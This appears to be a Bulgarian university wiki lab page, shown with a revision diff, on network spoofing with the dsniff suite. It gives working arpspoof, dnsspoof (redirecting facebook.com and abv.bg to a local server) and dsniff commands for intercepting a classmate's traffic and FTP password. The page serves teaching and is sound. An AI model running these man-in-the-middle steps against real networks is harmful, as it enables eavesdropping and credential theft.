Difference between revisions of "Spoofing"
(→dsniff) |
(→dsniff) |
||
(13 intermediate revisions by the same user not shown) | |||
Line 30: | Line 30: | ||
webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed). | webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed). | ||
− | Инсталация | + | Инсталация: |
− | |||
− | + | :~$ apt-get install dsniff | |
− | Пренасочване на трафика | + | == Пренасочване на трафика с arpspoof == |
− | |||
− | |||
− | |||
− | стартиране на | + | '''Задача:''' Да се пренасочи чужд трафик през вашата машина. |
− | $arpspoof -t | + | |
− | $arpspoof -t | + | *victim - машината, която ще се подслушва |
+ | *gateway - рутер на мрежата | ||
+ | |||
+ | Задачата да се изпълни по двама (на два компютъра). | ||
+ | *Victim ще бъде потребител на първия компютър. Ще отваря различни страници. | ||
+ | *На вторият компютър ще има стартирана виртуалка с Linux, от която ще се прави атаката за пренасочване на трафика. На вторият компютър ще има стартиран tcpdump който ще записва трафика. | ||
+ | ** ''tcpdump "port 80" -w trafik'' | ||
+ | *След определен време да се спре tcpdump файла с трафика да се разгледа с Wireshark | ||
+ | |||
+ | стартиране на arpspoof | ||
+ | $arpspoof victim -t gateway | ||
+ | $arpspoof gateway -t victim | ||
Включване на IP forwarding, иначе жертвата ще загуби свързаност | Включване на IP forwarding, иначе жертвата ще загуби свързаност | ||
$echo 1 > /proc/sys/net/ipv4/ip_forward | $echo 1 > /proc/sys/net/ipv4/ip_forward | ||
− | |||
− | |||
== dnsspoof == | == dnsspoof == | ||
+ | 1. Създаване на web сървър. | ||
− | + | 2. Конфигуриране домeйните, които искаме да фалшифицираме. | |
+ | Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме. | ||
Създаване на файл. | Създаване на файл. | ||
− | + | $nano host.new | |
Примерно съдържание. | Примерно съдържание. | ||
Line 60: | Line 67: | ||
172.16.16.165 *.abv.bg | 172.16.16.165 *.abv.bg | ||
− | 2. | + | 2. Стартирайте на програмата като администратор |
− | + | $dnsspoof -f host.new | |
След стартиране програмата слуша за dns запитвания. | След стартиране програмата слуша за dns запитвания. | ||
+ | == dsniff == | ||
− | + | Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата | |
− | + | == Използване на scp == | |
==mailsnarf == | ==mailsnarf == | ||
+ | |||
+ | [[Category:Мрежова сигурност]] |
Latest revision as of 09:38, 17 October 2015
Contents
dsniff
dsniff Включва различни инструменти даващи възможност за "компрометиране на мрежата"
Включени инструменти:
- arpspoof - Send out unrequested (and possibly forged) arp replies.
- dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
- dsniff - password sniffer for several protocols.
filesnarf - saves selected files sniffed from NFS traffic.
macof - flood the local network with random MAC addresses.
mailsnarf - sniffs mail on the LAN and stores it in mbox format.
msgsnarf - record selected messages from different Instant Messengers.
sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow - SSH traffic analyser.
tcpkill - kills specified in-progress TCP connections.
tcpnice - slow down specified TCP connections via "active" traffic shaping.
urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
Инсталация:
:~$ apt-get install dsniff
Пренасочване на трафика с arpspoof
Задача: Да се пренасочи чужд трафик през вашата машина.
- victim - машината, която ще се подслушва
- gateway - рутер на мрежата
Задачата да се изпълни по двама (на два компютъра).
- Victim ще бъде потребител на първия компютър. Ще отваря различни страници.
- На вторият компютър ще има стартирана виртуалка с Linux, от която ще се прави атаката за пренасочване на трафика. На вторият компютър ще има стартиран tcpdump който ще записва трафика.
- tcpdump "port 80" -w trafik
- След определен време да се спре tcpdump файла с трафика да се разгледа с Wireshark
стартиране на arpspoof
$arpspoof victim -t gateway $arpspoof gateway -t victim
Включване на IP forwarding, иначе жертвата ще загуби свързаност
$echo 1 > /proc/sys/net/ipv4/ip_forward
dnsspoof
1. Създаване на web сървър.
2. Конфигуриране домeйните, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.
Създаване на файл.
$nano host.new
Примерно съдържание.
172.16.16.165 *.facebook.com 172.16.16.165 *.abv.bg
2. Стартирайте на програмата като администратор
$dnsspoof -f host.new
След стартиране програмата слуша за dns запитвания.
dsniff
Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата